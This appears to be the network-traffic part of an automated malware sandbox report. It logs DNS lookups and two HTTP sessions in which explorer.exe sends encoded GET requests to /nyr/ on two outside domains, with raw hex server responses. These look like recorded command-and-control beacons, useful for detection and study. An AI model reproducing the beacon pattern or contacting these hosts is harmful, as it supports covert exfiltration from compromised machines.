                                        May 4, 2021 07:03:04.402079105 CEST6464653192.168.2.48.8.8.8
                                        May 4, 2021 07:03:04.451792002 CEST53646468.8.8.8192.168.2.4
                                        May 4, 2021 07:03:04.625377893 CEST6529853192.168.2.48.8.8.8
                                        May 4, 2021 07:03:04.682780027 CEST53652988.8.8.8192.168.2.4
                                        May 4, 2021 07:03:09.192593098 CEST5912353192.168.2.48.8.8.8
                                        May 4, 2021 07:03:09.244214058 CEST53591238.8.8.8192.168.2.4
                                        May 4, 2021 07:03:10.528140068 CEST5453153192.168.2.48.8.8.8
                                        May 4, 2021 07:03:10.585149050 CEST53545318.8.8.8192.168.2.4
                                        May 4, 2021 07:03:12.016319990 CEST4971453192.168.2.48.8.8.8
                                        May 4, 2021 07:03:12.065512896 CEST53497148.8.8.8192.168.2.4
                                        May 4, 2021 07:03:13.324980021 CEST5802853192.168.2.48.8.8.8
                                        May 4, 2021 07:03:13.373613119 CEST53580288.8.8.8192.168.2.4
                                        May 4, 2021 07:03:14.347913027 CEST5309753192.168.2.48.8.8.8
                                        May 4, 2021 07:03:14.398215055 CEST53530978.8.8.8192.168.2.4
                                        May 4, 2021 07:03:15.327704906 CEST4925753192.168.2.48.8.8.8
                                        May 4, 2021 07:03:15.376349926 CEST53492578.8.8.8192.168.2.4
                                        May 4, 2021 07:03:18.472831964 CEST6238953192.168.2.48.8.8.8
                                        May 4, 2021 07:03:18.521564007 CEST53623898.8.8.8192.168.2.4
                                        May 4, 2021 07:03:18.886133909 CEST4991053192.168.2.48.8.8.8
                                        May 4, 2021 07:03:18.950181007 CEST53499108.8.8.8192.168.2.4
                                        May 4, 2021 07:03:19.645800114 CEST5585453192.168.2.48.8.8.8
                                        May 4, 2021 07:03:19.705853939 CEST53558548.8.8.8192.168.2.4
                                        May 4, 2021 07:03:20.693160057 CEST6454953192.168.2.48.8.8.8
                                        May 4, 2021 07:03:20.744755983 CEST53645498.8.8.8192.168.2.4
                                        May 4, 2021 07:03:21.635854959 CEST6315353192.168.2.48.8.8.8
                                        May 4, 2021 07:03:21.684545994 CEST53631538.8.8.8192.168.2.4
                                        May 4, 2021 07:03:22.595444918 CEST5299153192.168.2.48.8.8.8
                                        May 4, 2021 07:03:22.647067070 CEST53529918.8.8.8192.168.2.4
                                        May 4, 2021 07:03:23.611274958 CEST5370053192.168.2.48.8.8.8
                                        May 4, 2021 07:03:23.660603046 CEST53537008.8.8.8192.168.2.4
                                        May 4, 2021 07:03:24.855562925 CEST5172653192.168.2.48.8.8.8
                                        May 4, 2021 07:03:24.909923077 CEST53517268.8.8.8192.168.2.4
                                        May 4, 2021 07:03:26.444029093 CEST5679453192.168.2.48.8.8.8
                                        May 4, 2021 07:03:26.500868082 CEST53567948.8.8.8192.168.2.4
                                        May 4, 2021 07:03:29.521269083 CEST5653453192.168.2.48.8.8.8
                                        May 4, 2021 07:03:29.571320057 CEST53565348.8.8.8192.168.2.4
                                        May 4, 2021 07:03:30.757359028 CEST5662753192.168.2.48.8.8.8
                                        May 4, 2021 07:03:30.817164898 CEST53566278.8.8.8192.168.2.4
                                        May 4, 2021 07:03:31.698815107 CEST5662153192.168.2.48.8.8.8
                                        May 4, 2021 07:03:31.747591972 CEST53566218.8.8.8192.168.2.4
                                        May 4, 2021 07:03:32.627163887 CEST6311653192.168.2.48.8.8.8
                                        May 4, 2021 07:03:32.676263094 CEST53631168.8.8.8192.168.2.4
                                        May 4, 2021 07:03:34.472414017 CEST6407853192.168.2.48.8.8.8
                                        May 4, 2021 07:03:34.522587061 CEST53640788.8.8.8192.168.2.4
                                        May 4, 2021 07:03:35.616674900 CEST6480153192.168.2.48.8.8.8
                                        May 4, 2021 07:03:35.666146040 CEST53648018.8.8.8192.168.2.4
                                        May 4, 2021 07:03:36.767832041 CEST6172153192.168.2.48.8.8.8
                                        May 4, 2021 07:03:36.816679955 CEST53617218.8.8.8192.168.2.4
                                        May 4, 2021 07:03:43.253061056 CEST5125553192.168.2.48.8.8.8
                                        May 4, 2021 07:03:43.305869102 CEST53512558.8.8.8192.168.2.4
                                        May 4, 2021 07:03:49.856846094 CEST6152253192.168.2.48.8.8.8
                                        May 4, 2021 07:03:49.917939901 CEST53615228.8.8.8192.168.2.4
                                        May 4, 2021 07:04:00.702004910 CEST5233753192.168.2.48.8.8.8
                                        May 4, 2021 07:04:00.760590076 CEST53523378.8.8.8192.168.2.4
                                        May 4, 2021 07:04:18.112989902 CEST5504653192.168.2.48.8.8.8
                                        May 4, 2021 07:04:18.163423061 CEST53550468.8.8.8192.168.2.4
                                        May 4, 2021 07:04:21.772597075 CEST4961253192.168.2.48.8.8.8
                                        May 4, 2021 07:04:21.849781990 CEST53496128.8.8.8192.168.2.4
                                        May 4, 2021 07:04:24.722948074 CEST4928553192.168.2.48.8.8.8
                                        May 4, 2021 07:04:24.786619902 CEST53492858.8.8.8192.168.2.4
                                        May 4, 2021 07:04:44.075501919 CEST5060153192.168.2.48.8.8.8
                                        May 4, 2021 07:04:44.139606953 CEST53506018.8.8.8192.168.2.4
                                        May 4, 2021 07:04:45.625130892 CEST6087553192.168.2.48.8.8.8
                                        May 4, 2021 07:04:45.676755905 CEST53608758.8.8.8192.168.2.4
                                        May 4, 2021 07:04:46.303735018 CEST5644853192.168.2.48.8.8.8
                                        May 4, 2021 07:04:46.360747099 CEST53564488.8.8.8192.168.2.4
                                        May 4, 2021 07:04:46.929398060 CEST5917253192.168.2.48.8.8.8
                                        May 4, 2021 07:04:46.977905035 CEST53591728.8.8.8192.168.2.4
                                        May 4, 2021 07:04:47.406775951 CEST6242053192.168.2.48.8.8.8
                                        May 4, 2021 07:04:47.455522060 CEST53624208.8.8.8192.168.2.4
                                        May 4, 2021 07:04:47.511563063 CEST6057953192.168.2.48.8.8.8
                                        May 4, 2021 07:04:47.568937063 CEST53605798.8.8.8192.168.2.4
                                        May 4, 2021 07:04:48.044918060 CEST5018353192.168.2.48.8.8.8
                                        May 4, 2021 07:04:48.104701042 CEST53501838.8.8.8192.168.2.4
                                        May 4, 2021 07:04:48.713677883 CEST6153153192.168.2.48.8.8.8
                                        May 4, 2021 07:04:48.770565033 CEST53615318.8.8.8192.168.2.4
                                        May 4, 2021 07:04:49.241159916 CEST4922853192.168.2.48.8.8.8
                                        May 4, 2021 07:04:49.298403978 CEST53492288.8.8.8192.168.2.4
                                        May 4, 2021 07:04:50.088316917 CEST5979453192.168.2.48.8.8.8
                                        May 4, 2021 07:04:50.137880087 CEST53597948.8.8.8192.168.2.4
                                        May 4, 2021 07:04:51.005819082 CEST5591653192.168.2.48.8.8.8
                                        May 4, 2021 07:04:51.073479891 CEST53559168.8.8.8192.168.2.4
                                        May 4, 2021 07:04:51.560627937 CEST5275253192.168.2.48.8.8.8
                                        May 4, 2021 07:04:51.617695093 CEST53527528.8.8.8192.168.2.4
                                        May 4, 2021 07:05:01.171524048 CEST6054253192.168.2.48.8.8.8
                                        May 4, 2021 07:05:01.223176003 CEST53605428.8.8.8192.168.2.4
                                        May 4, 2021 07:05:02.719784975 CEST6068953192.168.2.48.8.8.8
                                        May 4, 2021 07:05:02.789992094 CEST53606898.8.8.8192.168.2.4
                                        May 4, 2021 07:05:04.566591024 CEST6420653192.168.2.48.8.8.8
                                        May 4, 2021 07:05:04.631026030 CEST53642068.8.8.8192.168.2.4

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                        May 4, 2021 07:04:21.772597075 CEST192.168.2.48.8.8.80x430fStandard query (0)www.magnumopuspro.comA (IP address)IN (0x0001)
                                        May 4, 2021 07:04:44.075501919 CEST192.168.2.48.8.8.80x9a0fStandard query (0)www.maluss.comA (IP address)IN (0x0001)
                                        May 4, 2021 07:05:04.566591024 CEST192.168.2.48.8.8.80x7689Standard query (0)www.exclusiveflooringcollection.comA (IP address)IN (0x0001)

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                        May 4, 2021 07:04:21.849781990 CEST8.8.8.8192.168.2.40x430fName error (3)www.magnumopuspro.comnonenoneA (IP address)IN (0x0001)
                                        May 4, 2021 07:04:44.139606953 CEST8.8.8.8192.168.2.40x9a0fNo error (0)www.maluss.comlightcollect.myshopify.comCNAME (Canonical name)IN (0x0001)
                                        May 4, 2021 07:04:44.139606953 CEST8.8.8.8192.168.2.40x9a0fNo error (0)lightcollect.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                        May 4, 2021 07:04:44.139606953 CEST8.8.8.8192.168.2.40x9a0fNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                        May 4, 2021 07:05:04.631026030 CEST8.8.8.8192.168.2.40x7689No error (0)www.exclusiveflooringcollection.comext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)
                                        May 4, 2021 07:05:04.631026030 CEST8.8.8.8192.168.2.40x7689No error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)
                                        May 4, 2021 07:05:04.631026030 CEST8.8.8.8192.168.2.40x7689No error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)
                                        May 4, 2021 07:05:04.631026030 CEST8.8.8.8192.168.2.40x7689No error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)
                                        May 4, 2021 07:05:04.631026030 CEST8.8.8.8192.168.2.40x7689No error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • www.maluss.com
                                        • www.exclusiveflooringcollection.com

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.44975423.227.38.7480C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        May 4, 2021 07:04:44.201277971 CEST6365OUTGET /nyr/?tVZl=MKniHD/KKNZ944A0QkseLq559MRPs5jQaAqVav9SZ3PAwf03LQBPNZ+ImXhjCplVxvzR&U4kp=NtxHhLZ8S6kT5jw HTTP/1.1
                                        Host: www.maluss.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        May 4, 2021 07:04:44.374289989 CEST6367INHTTP/1.1 403 Forbidden
                                        Date: Tue, 04 May 2021 05:04:44 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        X-Sorting-Hat-PodId: 161
                                        X-Sorting-Hat-ShopId: 45740490914
                                        X-Dc: gcp-us-central1
                                        X-Request-ID: 0046b1ca-de3c-4bc2-af9b-2bb790ee44c9
                                        X-XSS-Protection: 1; mode=block
                                        X-Download-Options: noopen
                                        X-Content-Type-Options: nosniff
                                        X-Permitted-Cross-Domain-Policies: none
                                        CF-Cache-Status: DYNAMIC
                                        cf-request-id: 09d75cbaca00000614e9283000000001
                                        Server: cloudflare
                                        CF-RAY: 649f30a47de50614-FRA
                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                        Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67
                                        Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-heig
                                        May 4, 2021 07:04:44.374347925 CEST6368INData Raw: 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65
                                        Data Ascii: ht:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-bloc
                                        May 4, 2021 07:04:44.374392033 CEST6369INData Raw: 20 70 61 72 61 20 61 63 65 73 73 61 72 20 65 73 74 65 20 73 69 74 65 22 0a 20 20 7d 2c 0a 20 20 22 65 73 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 41 63 63 65 73 6f 20 64 65 6e 65 67 61 64 6f 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65
                                        Data Ascii: para acessar este site" }, "es": { "title": "Acceso denegado", "content-title": "No tienes permiso para acceder a esta pgina web" }, "ko": { "title": " ", "content-title": "
                                        May 4, 2021 07:04:44.374419928 CEST6371INData Raw: 69 74 6c 65 22 3a 20 22 e0 a4 aa e0 a4 b9 e0 a5 81 e0 a4 82 e0 a4 9a 20 e0 a4 85 e0 a4 b8 e0 a5 8d e0 a4 b5 e0 a5 80 e0 a4 95 e0 a5 83 e0 a4 a4 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 e0 a4 86 e0 a4 aa e0 a4 95
                                        Data Ascii: itle": " ", "content-title": " " }, "ja": { "tit
                                        May 4, 2021 07:04:44.374439001 CEST6371INData Raw: 73 20 3d 20 74 5b 6c 61 6e 67 75 61 67 65 5d 20 7c 7c 20 74 5b 22 65 6e 22 5d 3b 0a 20 20 2f 2f 20 52 65 70 6c 61 63 65 20 63 6f 6e 74 65 6e 74 20 6f 6e 20 73 63 72 65 65 6e 0a 20 20 66 6f 72 20 28 76 61 72 20 69 64 20 69 6e 20 74 72 61 6e 73 6c
                                        Data Ascii: s = t[language] || t["en"]; // Replace content on screen for (var id in translations) { target = document.querySelector("[data-i18n=" + id + "]"); if (target != undefined) { target.innerHTML = translations[id]; } } //
                                        May 4, 2021 07:04:44.374450922 CEST6371INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        1192.168.2.449768198.185.159.14480C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        May 4, 2021 07:05:04.803034067 CEST7277OUTGET /nyr/?tVZl=EDKKYtZbbvwE4Q/e7xe/ld4gtfmRUWoVn+FtgOYbXYxqqFBCU6VSMnG1GKc/0KEvkVST&U4kp=NtxHhLZ8S6kT5jw HTTP/1.1
                                        Host: www.exclusiveflooringcollection.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        May 4, 2021 07:05:04.979024887 CEST7281INHTTP/1.1 400 Bad Request
                                        Cache-Control: no-cache, must-revalidate
                                        Content-Length: 77564
                                        Content-Type: text/html; charset=UTF-8
                                        Date: Tue, 04 May 2021 05:05:04 UTC
                                        Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                        Pragma: no-cache
                                        Server: Squarespace
                                        X-Contextid: GJ1alLZ7/6uMYlJPg
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                        Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;
                                        May 4, 2021 07:05:04.979042053 CEST7282INData Raw: 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20
                                        Data Ascii: font-weight: 300; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) { body { font-size: 10px; } } @font-face { font-family
                                        May 4, 2021 07:05:04.979053020 CEST7283INData Raw: 5a 63 36 54 67 4b 77 31 43 5a 4c 45 58 79 47 5a 76 49 55 6a 4a 54 46 4c 57 58 69 45 6a 6b 6a 50 2f 45 62 4e 73 72 37 4a 58 55 39 6b 62 54 57 76 76 4e 49 74 64 68 59 66 30 56 70 6a 56 43 35 78 36 41 57 48 30 43 6f 70 4a 39 6b 4c 4c 32 46 4d 6f 34
                                        Data Ascii: Zc6TgKw1CZLEXyGZvIUjJTFLWXiEjkjP/EbNsr7JXU9kbTWvvNItdhYf0VpjVC5x6AWH0CopJ9kLL2FMo41uoZFFIwX0vyHuEjHYH2VmrxOkqFo0adgxDecFou4ep9oyEd/DYGc3ZB+z+7LZeRzLqapLukxRFwknNZLe1mD3UUryptN0i8agj3nXEkMT3jM6TFgFmSPui9ANP5tgumW+7GL2HT49v6T21zEFSmU/PyRmlIHkbMt
                                        May 4, 2021 07:05:04.979098082 CEST7283INData Raw: 41 62 54 6a 45 6d 75 66 55 51 6f 51 67 41 37 52 69 72 39 61 39 68 5a 78 71 47 69 48 63 52 46 7a 33 71 43 59 53 35 6f 69 36 56 6e 58 56 63 2b 31 6a 6f 48 35 33 57 4c 6c 77 6a 39 5a 58 78 72 33 37 75 63 66 65 38 35 4b 59 62 53 5a 45 6e 4e 50 71 75
                                        Data Ascii: AbTjEmufUQoQgA7Rir9a9hZxqGiHcRFz3qCYS5oi6VnXVc+1joH53WLlwj9ZXxr37ucfe85KYbSZEnNPquYQLdZGuGjum67O6vs4pznNN15fYXFdOLuLWXrsKEmCQSfZo21npOsch0vJ4uwm8gxs1rVFd7xXNcYLdHOA8u6Q+yN/ryi71Hun8adEPitdau1oRoJdRdmo7vWKu+0nK470m8D6uPnOKeCe7xMpwlB3s5Szbpd7HP+
                                        May 4, 2021 07:05:04.979115963 CEST7285INData Raw: 64 57 72 56 38 34 7a 76 71 7a 55 70 39 38 37 66 66 4f 71 71 2b 70 6a 34 6c 4d 59 63 71 2b 5a 58 75 5a 73 78 54 49 4d 35 5a 7a 6e 4f 75 49 56 7a 61 6e 45 38 43 58 6a 4f 52 4a 38 38 35 36 67 57 65 63 49 73 37 33 47 34 49 56 61 54 6f 6d 2b 46 64 5a
                                        Data Ascii: dWrV84zvqzUp987ffOqq+pj4lMYcq+ZXuZsxTIM5ZznOuIVzanE8CXjORJ8856gWecIs73G4IVaTom+FdZmk13iQhZpVvwWaeJJvZwmZfgLrMEPDsmWSeTP2pgBIVqr44ljnDOc42NDfmKJscRnzjslLu8YD7DeUiQta8q+gTM8UuJgxqs1ltlxGmF3mHRe8w7M6YKbpYWBIZw6abAXoINXCHv8WIYdhau8bWC2V991qxUKLIeS
                                        May 4, 2021 07:05:04.979126930 CEST7286INData Raw: 73 55 74 73 78 4c 45 35 68 38 53 70 70 4e 4d 66 78 35 69 6a 57 48 70 62 33 6d 5a 31 45 36 68 46 5a 43 4f 74 4a 6d 38 39 4a 38 42 6e 78 37 48 39 43 4d 66 7a 59 41 58 4d 37 66 6d 78 47 73 68 77 4c 6a 56 68 6f 78 30 49 4c 46 71 72 77 35 2b 64 6f 7a
                                        Data Ascii: sUtsxLE5h8SppNMfx5ijWHpb3mZ1E6hFZCOtJm89J8Bnx7H9CMfzYAXM7fmxGshwLjVhox0ILFqrw5+doz1Kt5lGsvahyjMuRVHINKIASaMX6Aaz/zP39dVJaibMTznE8XEmMq8H7zHPYm8ZeF/aKMDTB0O12KY6trbCV4ekxPC26HLAH2M1LTSQ0hyP1ROTBMgNLCwxVMHS4fHg2e2RNqvGnJI340EzbSTZWms3Y345WE1qeFI
                                        May 4, 2021 07:05:04.979140043 CEST7287INData Raw: 6a 66 69 63 35 33 53 6e 75 34 72 53 74 2b 48 74 59 6a 2b 4a 76 41 47 4a 49 64 55 67 7a 75 6b 70 63 44 65 4a 72 47 31 62 6d 34 57 73 62 6c 75 59 78 4f 77 31 62 47 7a 77 4c 30 44 74 4c 41 71 42 6c 41 74 30 35 36 4c 61 6a 65 7a 71 36 48 72 5a 50 77
                                        Data Ascii: jfic53Snu4rSt+HtYj+JvAGJIdUgzukpcDeJrG1bm4WsbluYxOw1bGzwL0DtLAqBlAt056Lajezq6HrZPw/M09kfgGcfzBOwryRaVDs6DJQcm6Z8PXsbsd4goAUYk4XLU6HLUiC2fVyfFCeYUc9OUuGlK7uaNENPDxPKgKHrPYD2KRgA0Jz1pdYiVah3ihI8SsbuZ7Qut7FtdT28OepdJALQ9kcuIqJaIlksKpGWQaBJEs5Ro2u
                                        May 4, 2021 07:05:04.979151964 CEST7289INData Raw: 49 73 56 6e 48 51 76 47 66 48 4a 59 2b 47 73 46 4f 76 65 49 61 4c 6b 5a 54 6f 6d 2b 43 35 70 6e 6e 30 5a 74 5a 4f 73 63 53 62 64 54 51 5a 49 5a 49 6a 7a 4e 47 71 33 6a 5a 65 59 56 58 71 62 44 42 4b 37 7a 4f 50 76 37 4e 6d 78 7a 6d 4d 43 6f 36 79
